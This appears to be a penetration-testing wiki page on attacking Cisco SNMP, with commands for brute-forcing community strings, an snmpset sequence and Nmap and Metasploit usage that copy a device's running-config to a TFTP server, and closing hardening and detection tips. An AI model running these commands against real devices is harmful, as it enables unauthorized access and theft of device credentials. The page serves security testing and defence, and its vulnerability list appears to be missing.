Cisco SNMP

Reading time: 5 minutes

Pentesting Cisco Networks

SNMP functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically read-only (RO) or read-write (RW) permissions.

A classic—yet still extremely effective—attack vector is to brute-force community strings in order to elevate from unauthenticated user to device administrator (RW community).
A practical tool for this task is onesixtyone:

onesixtyone -c community_strings.txt -i targets.txt

Other fast options are the Nmap NSE script snmp-brute or Hydra's SNMP module:

nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp

Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)

If you obtain an RW community you can copy the running-config/startup-config to a TFTP/FTP server without CLI access by abusing the CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96). Two common approaches are:

1. Nmap NSE – snmp-ios-config

nmap -sU -p161 --script snmp-ios-config \
     --script-args creds.snmp=private 192.168.66.1

The script automatically orchestrates the copy operation and prints the configuration to stdout .

2. Manual snmpset sequence

# Copy running-config (4) to a TFTP server (1) – random row id 1234
snmpset -v2c -c private 192.168.66.1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \    # protocol = tftp
  1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \    # sourceFileType = runningConfig
  1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \    # destFileType   = networkFile
  1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
  1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
  1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4       # rowStatus = createAndGo

Row identifiers are one-shot; reuse within five minutes triggers inconsistentValue errors.

Once the file is on your TFTP server you can inspect credentials (enable secret, username <user> secret, etc.) or even push a modified config back to the device.

Metasploit goodies

• cisco_config_tftp – downloads running-config/startup-config via TFTP after abusing the same MIB.
• snmp_enum – collects device inventory information, VLANs, interface descriptions, ARP tables, etc.

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run

Recent Cisco SNMP vulnerabilities (2023 – 2025)

Keeping track of vendor advisories is useful to scope zero-day-to-n-day opportunities inside an engagement:

Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant.

Hardening & Detection tips

• Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVE above).
• Prefer SNMPv3 with authPriv (SHA-256/AES-256) over v1/v2c.

  snmp-server group SECURE v3 priv
  snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
  

• Bind SNMP to a management VRF and restrict with standard numbered IPv4 ACLs (extended named ACLs are risky – CVE-2024-20373).
• Disable RW communities; if operationally required, limit them with ACL and views:
  snmp-server community <string> RW 99 view SysView
• Monitor for:
  • UDP/161 spikes or unexpected sources (SIEM rules).
  • CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource events indicating out-of-band config changes.
• Enable SNMPv3 logging and snmp-server packetsize 1500 to reduce certain DoS vectors.

References

• Cisco: How To Copy Configurations To and From Cisco Devices Using SNMP
• Cisco Security Advisory cisco-sa-snmp-uwBXfqww (CVE-2024-20373)